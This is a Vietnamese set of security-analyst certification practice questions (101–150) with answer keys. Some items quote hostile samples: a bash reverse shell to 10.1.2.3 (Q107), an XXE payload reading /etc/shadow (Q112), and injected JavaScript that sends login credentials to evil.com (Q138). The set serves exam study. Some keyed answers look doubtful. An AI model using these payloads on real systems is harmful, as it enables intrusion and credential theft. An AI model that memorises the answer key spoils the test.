Câu 101:

Một chuyên viên phân tích đang xem xét các sự kiện trong nhiều hệ thống nhưng gặp khó khăn trong việc tương quan các điểm dữ liệu. Điều nào sau đây có thể là vấn đề của hệ thống?

A. Quyền truy cập
B. Phân đoạn mạng
C. Đồng bộ thời gian
D. Sổ tay không hợp lệ

ĐÁP ÁN: C

Câu 102:

Một chuyên viên phân tích khuyến nghị rằng một agent EDR nên thu thập địa chỉ IP nguồn, kết nối với tường lửa và tạo một chính sách để tự động chặn địa chỉ IP nguồn độc hại trên toàn bộ mạng. Lựa chọn nào sau đây là tốt nhất để giúp chuyên viên phân tích triển khai khuyến nghị này?

A. SOAR
B. SIEM
C. SLA
D. IoC

ĐÁP ÁN: A

Câu 103:

Ngày kết thúc vòng đời đã được công bố cho một hệ điều hành được sử dụng rộng rãi. Một chức năng quan trọng của doanh nghiệp được thực hiện bởi một số máy móc được điều khiển bởi một PC, đang sử dụng hệ điều hành sắp đến ngày kết thúc vòng đời. Điều nào sau đây mô tả rõ nhất mối quan tâm của chuyên viên phân tích bảo mật?

A. Mọi lỗ hổng được phát hiện sẽ không được khắc phục.
B. Sự cố ngừng hoạt động của máy móc sẽ khiến tổ chức tốn kém.
C. Sẽ không có hỗ trợ cho máy móc quan trọng.
D. Không có biện pháp kiểm soát bù trừ nào cho hệ điều hành.

ĐÁP ÁN: A

Câu 104:

Điều nào sau đây mô tả lý do tốt nhất để tiến hành phân tích nguyên nhân gốc rễ?

A. Phân tích nguyên nhân gốc rễ đảm bảo rằng các mốc thời gian thích hợp đã được ghi lại.
B. Phân tích nguyên nhân gốc rễ cho phép sự cố được ghi lại đúng cách để báo cáo.
C. Phân tích nguyên nhân gốc rễ đưa ra các khuyến nghị để cải thiện quy trình.
D. Phân tích nguyên nhân gốc rễ xác định các mục đóng góp tạo điều kiện cho sự kiện.

ĐÁP ÁN: D

Câu 105:

Khái niệm nào sau đây là một ví dụ về việc sử dụng API để chèn các yêu cầu truy cập hàng loạt từ một tệp vào hệ thống quản lý danh tính?

A. Chỉ huy và kiểm soát
B. Làm giàu dữ liệu
C. Tự động hóa
D. Đăng nhập một lần

ĐÁP ÁN: C

Câu 106:

Một chuyên viên phân tích SOC khuyến nghị thêm một lớp phòng thủ cho tất cả các endpoint để bảo vệ tốt hơn trước các mối đe dọa bên ngoài bất kể hệ điều hành của thiết bị. Điều nào sau đây đáp ứng tốt nhất yêu cầu này?

A. SIEM
B. CASB
C. SOAR
D. EDR

ĐÁP ÁN: D

Câu 107:

Một chuyên viên phân tích bảo mật đã xác định mục đáng ngờ sau trong nhật ký IDS dựa trên host:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Chuyên viên phân tích nên sử dụng tập lệnh shell nào sau đây để xác nhận chính xác nhất xem hoạt động có đang diễn ra hay không?

A. #!/bin/bash
nc 10.1.2.3 8080 -vv >dev/null && echo “Hoạt động độc hại” || echo “OK”
B. #!/bin/bash
ps -fea | grep 8080 >dev/null && echo “Hoạt động độc hại” || echo “OK”
C. #!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >dev/null && echo “Hoạt động độc hại” || echo “OK”
D. #!/bin/bash
netstat -antp | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”

ĐÁP ÁN: D

Câu 108:

Một công ty lo ngại về việc tìm kiếm các vị trí lưu trữ tệp nhạy cảm đang mở cho công chúng. Mạng đám mây nội bộ hiện tại là phẳng. Giải pháp nào sau đây là tốt nhất để bảo mật mạng?

A. Triển khai phân đoạn với ACL.
B. Cấu hình ghi nhật ký và giám sát cho SIEM.
C. Triển khai MFA đến các vị trí lưu trữ đám mây.
D. Triển khai IDS.

ĐÁP ÁN: A

Câu 109:

Một chuyên viên phân tích bảo mật đang xem xét các phát hiện của báo cáo lỗ hổng mới nhất cho ứng dụng web của công ty. Ứng dụng web chấp nhận các tệp cho một tập lệnh Bash được xử lý nếu các tệp khớp với một hàm băm nhất định. Chuyên viên phân tích có thể gửi tệp đến hệ thống do va chạm băm. Chuyên viên phân tích nên đề xuất điều nào sau đây để giảm thiểu lỗ hổng với ít thay đổi nhất đối với tập lệnh và cơ sở hạ tầng hiện tại?

A. Triển khai WAF lên đầu ứng dụng.
B. Thay thế MD5 hiện tại bằng SHA-256.
C. Triển khai ứng dụng diệt virus trên hệ thống lưu trữ.
D. Thay thế MD5 bằng chữ ký số.

ĐÁP ÁN: B

Câu 110:

Một chuyên viên phân tích bảo mật cần giảm thiểu lỗ hổng đã biết, bị khai thác liên quan đến vector tấn công nhúng phần mềm thông qua giao diện USB. Chuyên viên phân tích nên làm gì trước tiên?

A. Tiến hành đào tạo nâng cao nhận thức bảo mật về rủi ro khi sử dụng USB không xác định và không được mã hóa.
B. Viết chính sách phương tiện di động có thể tháo rời giải thích rằng không thể kết nối USB với tài sản của công ty.
C. Kiểm tra cấu hình để xác định xem cổng USB có được bật trên tài sản của công ty hay không.
D. Xem lại nhật ký để xem liệu lỗ hổng có thể khai thác này đã ảnh hưởng đến công ty hay chưa.

ĐÁP ÁN: C

Câu 111:

Một quản trị viên hệ thống nhận được báo cáo về một máy chủ Linux có thể truy cập internet đang chạy rất chậm. Quản trị viên kiểm tra máy chủ, thấy mức sử dụng bộ nhớ cao và nghi ngờ một cuộc tấn công DoS liên quan đến các phiên TCP đang mở một nửa đang tiêu thụ bộ nhớ. Công cụ nào sau đây sẽ giúp chứng minh tốt nhất liệu máy chủ này có gặp phải hành vi này hay không?

A. Nmap
B. TCPDump
C. SIEM
D. EDR

ĐÁP ÁN: B

Câu 112:

Một chuyên viên phân tích bảo mật đang xác thực một phát hiện cụ thể được báo cáo trong bản quét lỗ hổng ứng dụng web để đảm bảo rằng đó không phải là dương tính giả. Chuyên viên phân tích bảo mật sử dụng đoạn mã sau:

<!–?xml version=”1.0″ ?–>

<!DOCTYPE replace [<! ENTITY ent SYSTEM “file:////etc/shadow”>]>

<userInfo>
<firstName>John</firstName>
<lastName>$ent;</lastName>
</userInfo>

Chuyên viên phân tích bảo mật đang xác thực loại lỗ hổng nào sau đây?

A. Duyệt thư mục
B. XSS
C. XXE
D. SSRF

ĐÁP ÁN: C

Câu 113:

Yếu tố nào sau đây là quan trọng nhất để đảm bảo báo cáo ứng phó sự cố chính xác?

A. Dòng thời gian được xác định rõ ràng về các sự kiện
B. Nguyên tắc để báo cáo quy định
C. Nhật ký từ hệ thống bị ảnh hưởng
D. Tóm tắt điều hành được phát triển tốt

ĐÁP ÁN: A

Câu 114:

Một chuyên viên phân tích bảo mật đang cố gắng phát hiện các kết nối đến một địa chỉ IP đáng ngờ bằng cách thu thập các gói dữ liệu từ gateway. Chuyên viên phân tích bảo mật nên cân nhắc chạy lệnh nào sau đây?

A. grep [địa chỉ IP] packets.pcap
B. cat packets.pcap | grep [Địa chỉ IP]
C. tcpdump -n -r packets.pcap host [địa chỉ IP]
D. strings packets.pcap | grep [Địa chỉ IP]

ĐÁP ÁN: C

Câu 115:

Một chuyên viên phân tích bảo mật xem xét các bản quét lỗ hổng mới nhất và quan sát thấy có các lỗ hổng có điểm CVSSv3 tương tự nhưng các số liệu điểm cơ sở khác nhau. Chuyên viên phân tích nên khắc phục vector tấn công nào sau đây trước tiên?

A. CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
B. CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
C. CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
D. CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

ĐÁP ÁN: C

Câu 116:

Một chuyên viên phân tích bảo mật phải xem xét một email đáng ngờ để xác định tính hợp pháp của nó. Nên thực hiện những điều nào sau đây? (Chọn hai)

A. Đánh giá các trường điểm, chẳng hạn như Mức độ tin cậy thư rác và Mức độ khiếu nại hàng loạt
B. Xem lại tiêu đề từ email được chuyển tiếp
C. Kiểm tra trường địa chỉ người nhận
D. Xem lại tiêu đề Loại nội dung
E. Đánh giá chuỗi HELO hoặc EHLO của máy chủ email đang kết nối
F. Kiểm tra các trường SPF, DKIM và DMARC từ email gốc

ĐÁP ÁN: AF

Câu 117:

Một chuyên viên phân tích lỗ hổng nhận được danh sách các lỗ hổng hệ thống và cần đánh giá tác động liên quan của các khai thác đối với doanh nghiệp. Với các ràng buộc của sprint hiện tại, chỉ có ba lỗ hổng có thể được khắc phục. Điều nào sau đây thể hiện rủi ro ít tác động nhất, cho điểm cơ sở CVSS3.1?

A. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L – Điểm cơ sở 6.0
B. AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:L – Điểm cơ sở 7.2
C. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H – Điểm cơ sở 6.4
D. AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L – Điểm cơ sở 6.5

ĐÁP ÁN: D

Câu 118:

Một bản quét lỗ hổng gần đây đã dẫn đến một số lượng lớn bất thường các phát hiện quan trọng và cao cần vá. SLA yêu cầu các phát hiện phải được khắc phục trong một khoảng thời gian cụ thể. Cách tiếp cận nào sau đây là tốt nhất để đảm bảo tất cả các lỗ hổng được vá theo SLA?

A. Tích hợp hệ thống bán vé cung cấp dịch vụ CNTT để theo dõi việc khắc phục và đóng
B. Tạo một mục kiểm soát bù trừ cho đến khi hệ thống có thể được vá hoàn toàn
C. Chấp nhận rủi ro và ngừng sử dụng tài sản hiện tại khi kết thúc vòng đời
D. Yêu cầu ngoại lệ và vá thủ công từng hệ thống

ĐÁP ÁN: A

Câu 119:

Điều nào sau đây sẽ giúp chuyên viên phân tích nhanh chóng tìm ra xem địa chỉ IP trong cảnh báo SIEM có phải là địa chỉ IP độc hại đã biết hay không?

A. Tham gia một trung tâm chia sẻ và phân tích thông tin dành riêng cho ngành của công ty
B. Tải lên thông tin tình báo về mối đe dọa lên IPS ở định dạng STIX/TAXII
C. Thêm làm giàu dữ liệu cho IP trong đường ống thu nhận
D. Xem xét các nguồn cấp dữ liệu về mối đe dọa sau khi xem cảnh báo SIEM

ĐÁP ÁN: C

Câu 120:

Một tổ chức đã bị xâm phạm và tên người dùng và mật khẩu của tất cả nhân viên đã bị rò rỉ trực tuyến. Điều nào sau đây mô tả tốt nhất biện pháp khắc phục có thể làm giảm tác động của tình huống này?

A. Xác thực đa yếu tố
B. Thay đổi mật khẩu
C. Làm cứng hệ thống
D. Mã hóa mật khẩu

ĐÁP ÁN: B

Câu 121:

Một công ty đang triển khai phần mềm quét lỗ hổng mới để đánh giá hệ thống của mình. Mạng hiện tại được phân đoạn cao và nhóm mạng muốn giảm thiểu số lượng quy tắc tường lửa duy nhất. Kỹ thuật quét nào sau đây sẽ hiệu quả nhất để đạt được mục tiêu?

A. Triển khai agent trên tất cả các hệ thống để thực hiện quét
B. Triển khai máy quét trung tâm và thực hiện quét không có chứng chỉ
C. Triển khai máy quét dựa trên đám mây và thực hiện quét mạng
D. Triển khai cảm biến máy quét trên mọi phân đoạn và thực hiện quét có chứng chỉ

ĐÁP ÁN: A

Câu 122:

Tài khoản email của một tổ chức đã bị xâm phạm bởi một tác nhân xấu. Với thông tin sau:
[Thông tin bảng]

Điều nào sau đây là khoảng thời gian nhóm mất để phát hiện mối đe dọa?

A. 25 phút
B. 40 phút
C. 45 phút
D. 2 giờ

ĐÁP ÁN: A

Câu 123:

Một quản trị viên bảo mật cần nhập bản ghi dữ liệu PII từ môi trường sản xuất sang môi trường thử nghiệm cho mục đích thử nghiệm. Điều nào sau đây sẽ bảo vệ tốt nhất tính bảo mật dữ liệu?

A. Che dữ liệu
B. Băm
C. Đóng dấu mờ
D. Mã hóa

ĐÁP ÁN: A

Câu 124:

Quản trị viên hệ thống email cho một tổ chức đã định cấu hình ký DKIM cho tất cả email được gửi hợp pháp bởi tổ chức. Điều nào sau đây có thể cho biết email là độc hại nếu tên miền của công ty được sử dụng làm cả người gửi và người nhận?

A. Tin nhắn không vượt qua kiểm tra DMARC
B. Địa chỉ IP gửi là nhà cung cấp dịch vụ lưu trữ
C. Chữ ký không đáp ứng các tiêu chuẩn của công ty
D. Địa chỉ người gửi và người trả lời khác nhau

ĐÁP ÁN: A

Câu 125:

Trong một sự cố liên quan đến lừa đảo, chuyên viên phân tích bảo mật cần tìm nguồn gốc của email độc hại. Kỹ thuật nào sau đây sẽ cung cấp cho chuyên viên phân tích thông tin này?

A. Phân tích tiêu đề
B. Chụp gói tin
C. Kiểm tra SSL
D. Kỹ thuật đảo ngược

ĐÁP ÁN: A

Câu 126:

Một chuyên viên phân tích muốn đảm bảo rằng người dùng chỉ sử dụng phần mềm dựa trên web đã được tổ chức phê duyệt trước. Nên triển khai điều nào sau đây?

A. Danh sách chặn
B. Danh sách cho phép
C. Danh sách xám
D. Webhooks

ĐÁP ÁN: B

Câu 127:

Trong một sự cố an ninh mạng, một trong các máy chủ web tại mạng ngoại vi bị ảnh hưởng bởi ransomware. Hành động nào sau đây nên được thực hiện ngay lập tức?

A. Tắt máy chủ.
B. Cài đặt lại máy chủ.
C. Cách ly máy chủ.
D. Cập nhật hệ điều hành lên phiên bản mới nhất.

ĐÁP ÁN: C

Câu 128:

Một tổ chức gần đây đã thay đổi kế hoạch BC và DR của mình. Điều nào sau đây sẽ cho phép nhóm ứng phó sự cố kiểm tra các thay đổi tốt nhất mà không ảnh hưởng đến hoạt động kinh doanh?

A. Thực hiện một cuộc diễn tập trên bàn dựa trên các kịch bản sự cố đã xác định trước đó.
B. Mô phỏng một sự cố bằng cách tắt nguồn của trung tâm dữ liệu chính.
C. Di chuyển khối lượng công việc đang hoạt động từ trung tâm dữ liệu chính sang vị trí thứ cấp.
D. So sánh kế hoạch hiện tại với các bài học kinh nghiệm từ các sự cố trước đó.

ĐÁP ÁN: A

Câu 129:

Các chuyên viên phân tích bảo mật xem xét nhật ký trên nhiều máy chủ hàng ngày. Việc triển khai nào sau đây sẽ cung cấp khả năng hiển thị tập trung tốt nhất vào các sự kiện xảy ra trong toàn bộ môi trường doanh nghiệp mà không cần đăng nhập vào từng máy chủ?

A. Triển khai cơ sở dữ liệu để tổng hợp nhật ký
B. Cấu hình các máy chủ để chuyển tiếp nhật ký đến SIEM
C. Chia sẻ thư mục nhật ký trên mỗi máy chủ để cho phép truy cập cục bộ.
D. Tự động hóa việc gửi email nhật ký đến các chuyên viên phân tích.

ĐÁP ÁN: B

Câu 130:

Sau một sự cố bảo mật gần đây, Giám đốc An ninh Thông tin lo ngại về việc cải thiện khả năng hiển thị và báo cáo về các tác nhân độc hại trong môi trường. Mục tiêu là giảm thời gian để ngăn chặn chuyển động bên và rò rỉ dữ liệu tiềm ẩn. Kỹ thuật nào sau đây sẽ đạt được sự cải thiện tốt nhất?

A. Thời gian trung bình để phát hiện
B. Thời gian trung bình để phản hồi
C. Thời gian trung bình để khắc phục
D. Thời gian hoạt động của thỏa thuận cấp độ dịch vụ

ĐÁP ÁN: A

Câu 131:

Sau khi xác định mối đe dọa, một công ty đã quyết định triển khai chương trình quản lý bản vá để khắc phục các lỗ hổng. Công ty đang thực hiện nguyên tắc quản lý rủi ro nào sau đây?

A. Chuyển giao
B. Chấp nhận
C. Giảm thiểu
D. Tránh

ĐÁP ÁN: C

Câu 132:

Một chuyên viên phân tích bảo mật phát hiện ra một cuộc tấn công ransomware đang diễn ra trong khi điều tra email lừa đảo. Chuyên viên phân tích tải xuống một bản sao của tệp từ email và cách ly máy trạm bị ảnh hưởng khỏi mạng. Chuyên viên phân tích nên thực hiện hoạt động nào sau đây tiếp theo?

A. Xóa máy tính và cài đặt lại phần mềm
B. Tắt máy chủ email và cách ly nó khỏi mạng
C. Thu thập hình ảnh ở cấp bit của máy trạm bị ảnh hưởng
D. Tìm kiếm những người dùng thư khác đã nhận được cùng một tệp

ĐÁP ÁN: D

Câu 133:

Chuyên viên phân tích bảo mật đã nhận được báo cáo lỗ hổng hàng tháng. Các phát hiện sau đây đã được bao gồm trong báo cáo:

• Năm trong số các hệ thống chỉ yêu cầu khởi động lại để hoàn tất ứng dụng vá
• Hai trong số các máy chủ đang chạy hệ điều hành lỗi thời và không thể vá

Chuyên viên phân tích xác định rằng cách duy nhất để đảm bảo các máy chủ này không bị xâm phạm là cách ly chúng. Cách tiếp cận nào sau đây sẽ giảm thiểu rủi ro của các máy chủ lỗi thời bị xâm phạm tốt nhất?

A. Kiểm soát bù trừ
B. Thẩm định
C. Cửa sổ bảo trì
D. Khám phá thụ động

ĐÁP ÁN: A

Câu 134:

Chuyên viên phân tích lỗ hổng xem xét thông tin tình báo về mối đe dọa liên quan đến các lỗ hổng mới nổi ảnh hưởng đến máy trạm được sử dụng trong công ty:
[Bảng thông tin]

Biết rằng người dùng cuối thường nhấp vào các liên kết độc hại được gửi qua email, chuyên viên phân tích nên quan tâm nhất đến lỗ hổng nào sau đây?

A. Lỗ hổng A
B. Lỗ hổng B
C. Lỗ hổng C
D. Lỗ hổng D

ĐÁP ÁN: A

Câu 135:

Một chuyên viên phân tích ứng phó sự cố đang tiếp quản một cuộc điều tra từ một chuyên viên phân tích khác. Cuộc điều tra đã diễn ra trong vài ngày qua. Bước nào sau đây là quan trọng nhất trong quá trình chuyển đổi giữa hai chuyên viên phân tích?

A. Xác định và thảo luận về các bài học kinh nghiệm với chuyên viên phân tích trước đó.
B. Chấp nhận tất cả các phát hiện và tiếp tục điều tra mục tiêu tiếp theo.
C. Xem lại các bước mà chuyên viên phân tích trước đó đã thực hiện.
D. Xác thực nguyên nhân gốc rễ từ chuyên viên phân tích trước đó.

ĐÁP ÁN: C

Câu 136:

Một công ty gần đây đã xóa quyền quản trị khỏi tất cả máy trạm người dùng cuối của mình. Một chuyên viên phân tích sử dụng số liệu khai thác CVSSv3.1 để ưu tiên các lỗ hổng cho máy trạm và tạo ra thông tin sau:
[Bảng thông tin]

Lỗ hổng nào sau đây nên được ưu tiên khắc phục?

A. nessie.explosion
B. vote.4p
C. sweet.bike
D. great.skills

ĐÁP ÁN: D

Câu 137:

Một bài kiểm tra thâm nhập gần đây đã phát hiện ra rằng một số nhân viên đã bị dụ dỗ hỗ trợ kẻ tấn công bằng cách truy cập các trang web cụ thể và chạy các tệp đã tải xuống khi được nhắc qua điện thoại. Điều nào sau đây sẽ giải quyết vấn đề này tốt nhất?

A. Tăng cường đào tạo và nâng cao nhận thức cho tất cả nhân viên
B. Đảm bảo rằng không thể truy cập các trang web độc hại
C. Chặn tất cả các tập lệnh được tải xuống từ internet
D. Vô hiệu hóa khả năng chạy các ứng dụng đã tải xuống của tất cả nhân viên

ĐÁP ÁN: A

Câu 138:

Một chuyên viên phân tích bảo mật tại một công ty đang xem xét một cảnh báo từ giám sát tính toàn vẹn tệp cho biết không khớp trong băm tệp login.html. Sau khi so sánh mã với phiên bản mã nguồn trang trước đó, chuyên viên phân tích đã tìm thấy đoạn mã sau được thêm vào:

$.ajax((
dataType: ‘JSON’,
url: ‘https://evil.com/finish.php?x-ZXZpbA–‘,
type: ‘POST’,
data: {
)

email: email%40domain.com,
password: password

Hoạt động nào sau đây mô tả rõ nhất hoạt động mà chuyên viên phân tích đã quan sát được?

A. Liên kết bị xáo trộn
B. Rò rỉ dữ liệu
C. Thay đổi trái phép
D. Beaconing

ĐÁP ÁN: C

Câu 139:

Một quản trị viên bảo mật đã được bộ phận vận hành CNTT thông báo rằng một số báo cáo lỗ hổng chứa danh sách phát hiện không đầy đủ. Phương pháp nào sau đây nên được sử dụng để giải quyết vấn đề này?

A. Quét có chứng chỉ
B. Quét bên ngoài
C. Quét chênh lệch
D. Quét mạng

ĐÁP ÁN: A

Câu 140:

Một tổ chức đã bật quy tắc SIEM để gửi cảnh báo đến danh sách phân phối chuyên viên phân tích bảo mật khi mười lần đăng nhập không thành công xảy ra trong vòng một phút. Tuy nhiên, biện pháp kiểm soát không thể phát hiện ra một cuộc tấn công với chín lần đăng nhập không thành công. Điều nào sau đây thể hiện rõ nhất những gì đã xảy ra?

A. Dương tính giả
B. Âm tính thật
C. Âm tính giả
D. Dương tính thật

ĐÁP ÁN: C

Câu 141:

Một chuyên viên phân tích an ninh mạng được giao nhiệm vụ quét một ứng dụng web để hiểu nơi quét sẽ đi và liệu có URI nào nên bị từ chối truy cập trước khi quét chuyên sâu hơn hay không. Hoạt động quét nào sau đây phù hợp nhất với loại hoạt động quét được yêu cầu?

A. Quét không có chứng chỉ
B. Quét khám phá
C. Quét lỗ hổng
D. Quét có chứng chỉ

ĐÁP ÁN: B

Câu 142:

Điều nào sau đây mô tả rõ nhất quá trình yêu cầu khắc phục mối đe dọa đã biết trong một khung thời gian nhất định?

A. SLA
B. MOU
C. Vá lỗi theo nỗ lực tốt nhất
D. Quản trị tổ chức

ĐÁP ÁN: A

Câu 143:

Nguyên tắc quản lý rủi ro nào sau đây được hoàn thành bằng cách mua bảo hiểm an ninh mạng?

A. Chấp nhận
B. Tránh
C. Giảm thiểu
D. Chuyển giao

ĐÁP ÁN: D

Câu 144:

Kiểm toán gần đây về chương trình quản lý lỗ hổng đã nêu ra phát hiện về việc nâng cao nhận thức về thực hành mã hóa an toàn. Điều nào sau đây là tốt nhất để giải quyết phát hiện này?

A. Thiết lập đào tạo SDLC hàng quý về các lỗ hổng hàng đầu cho các nhà phát triển
B. Tiến hành kiểm tra hàng năm các kho mã và cung cấp báo cáo cho ban quản lý.
C. Thuê một bài kiểm tra thâm nhập bên ngoài của mạng
D. Triển khai nhiều máy quét lỗ hổng hơn để tăng phạm vi phủ sóng

ĐÁP ÁN: A

Câu 145:

Một tổ chức đã triển khai hệ thống lưu trữ dựa trên đám mây cho dữ liệu được chia sẻ đang ở giai đoạn hai của vòng đời dữ liệu. Nhóm bảo mật nên đảm bảo các biện pháp kiểm soát nào sau đây được giải quyết? (Chọn hai)

A. Phân loại dữ liệu
B. Phá hủy dữ liệu
C. Ngăn chặn mất dữ liệu
D. Mã hóa
E. Sao lưu
F. Kiểm soát truy cập

ĐÁP ÁN: DF

Câu 146:

Một chuyên viên phân tích đang tiến hành đánh giá lỗ hổng thường xuyên trên cơ sở hạ tầng của công ty. Khi thực hiện các lần quét này, một máy chủ quan trọng của doanh nghiệp bị sập và nguyên nhân được truy ngược lại là máy quét lỗ hổng. Điều nào sau đây là nguyên nhân của vấn đề này?

A. Máy quét đang chạy mà không có agent được cài đặt.
B. Máy quét đang chạy ở chế độ chủ động.
C. Máy quét được phân đoạn không đúng cách
D. Máy quét được cấu hình với cửa sổ quét

ĐÁP ÁN: B

Câu 147:

Nhóm tình báo về mối đe dọa của một tổ chức lưu ý xu hướng gần đây trong các thủ tục leo thang đặc quyền của đối phương. Nhiều nhóm đe dọa đã được quan sát thấy đang sử dụng các công cụ Windows gốc để bỏ qua các biện pháp kiểm soát hệ thống và thực thi các lệnh bằng chứng chỉ đặc quyền. Biện pháp kiểm soát nào sau đây sẽ hiệu quả nhất để giảm tỷ lệ thành công của các nỗ lực như vậy?

A. Đặt bảo vệ kiểm soát tài khoản người dùng ở mức hạn chế nhất trên tất cả các thiết bị
B. Triển khai các yêu cầu MFA cho tất cả các tài nguyên nội bộ
C. Làm cứng hệ thống bằng cách vô hiệu hóa hoặc xóa các dịch vụ không cần thiết
D. Triển khai các biện pháp kiểm soát để chặn thực thi các ứng dụng không đáng tin cậy

ĐÁP ÁN: C

Câu 148:

Một lỗ hổng zero-day mới đã được phát hành. Một chuyên viên phân tích bảo mật đang ưu tiên hệ thống nào nên nhận việc triển khai các biện pháp kiểm soát bù trừ trước tiên. Các hệ thống đã được nhóm thành các danh mục được hiển thị bên dưới:
[Bảng thông tin]

Nhóm nào sau đây nên được ưu tiên cho các biện pháp kiểm soát bù trừ?

A. Nhóm A
B. Nhóm B
C. Nhóm C
D. Nhóm D

ĐÁP ÁN: C

Câu 149:

Một Giám đốc An ninh Thông tin muốn lập bản đồ tất cả các vector tấn công mà công ty phải đối mặt mỗi ngày. Công ty nên căn chỉnh các biện pháp kiểm soát bảo mật của mình theo khuyến nghị nào sau đây?

A. OSSTMM
B. Mô hình kim cương phân tích xâm nhập
C. OWASP
D. MITRE ATT&CK

ĐÁP ÁN: D

Câu 150:

Một chuyên viên phân tích có thể thực hiện hành động nào sau đây sau khi một sự cố đã được điều tra?

A. Đánh giá rủi ro
B. Phân tích nguyên nhân gốc rễ
C. Kế hoạch ứng phó sự cố
D. Bài tập trên bàn

ĐÁP ÁN: B

Để lại một bình luận

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

Trending